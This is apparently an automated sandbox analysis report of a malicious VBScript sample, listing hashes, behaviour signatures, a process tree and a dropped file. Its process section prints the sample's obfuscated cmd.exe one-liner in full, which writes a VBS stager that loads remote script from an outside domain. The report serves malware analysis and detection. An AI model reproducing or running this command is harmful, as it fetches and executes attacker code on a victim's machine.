Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/12/2023, 15:14

General

  • Target

    287e0a96c764aab61c0dfd2469fde185.vbs

  • Size

    59KB

  • MD5

    287e0a96c764aab61c0dfd2469fde185

  • SHA1

    be1fa431415c446bf5b690e62b293fa468f63617

  • SHA256

    cb350db86b49a5bf6a2735dd03d6509ac1ca7c80130daa848f9929b531b6e616

  • SHA512

    e93dc6819e7b24d033a9717ea1e4b7eb825f19d0700c2ba6146cef63a204f8f4dc5fce9cbf6ff6ff16c8341b3ab88bd56cd45dd6c401489a6b5e56d2a11d163a

  • SSDEEP

    768:rtVO9PdrtQpv7UjbW9Ehx6Y4WwmGBC1dRv4P7SivUDwnZnIwuI8Jd:bO9PdrSpvh99Y4WJKP7DGwnZnIwd8Jd

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\287e0a96c764aab61c0dfd2469fde185.vbs"
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "SEt A4O7=.vb&&SEt q0wd57= rbgq0u48 =qhk53 ^"scqhk53riqhk53ptqhk53:^": i5430j43 =qhk53 ^"hqhk53TtPsqhk53:^": Gqhk53etqhk53Objqhk53ecqhk53t(qhk53rbgq0u48+i5430j43+^"&&sET qhk53=n47076n47076mut4h.gotdns.ch/p2.php^")&&sEt/^p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%"<nul > C:\Users\Public\^d4120%A4O7%s|start cmd /c start C:\Users\Public\^d4120%A4O7%s"
      • Suspicious use of WriteProcessMemory
      PID:2332
  • C:\Windows\system32\cmd.exe
    cmd /c start C:\Users\Public\d4120.vbs
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5024
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\d4120.vbs"
      PID:3240
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\d4120%A4O7%s "
      • Suspicious use of WriteProcessMemory
      PID:4500
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" sEt/p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%" 0<nul 1>C:\Users\Public\d4120%A4O7%s"
      PID:1680

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Public\d4120.vbs

  • Filesize

    98B

  • MD5

    642e2fa68bf257b7c2891abca9e0c994

  • SHA1

    4e2b917f2dbd6bbc72224edaedaf18bdfea7ba7f

  • SHA256

    887469bfc0aae71beed5cde7d40f4c9403ab1bb8c1df4b0e513860c1fa7e8522

  • SHA512

    e100bbdc3f9ccf6a634f647169999e66118a31b70f8047cd8c1c8dd0cbd8495bc6f6ab1c62a104dd7e895c2d83e16ab3644797b7bfc7091c66afa46ed232a376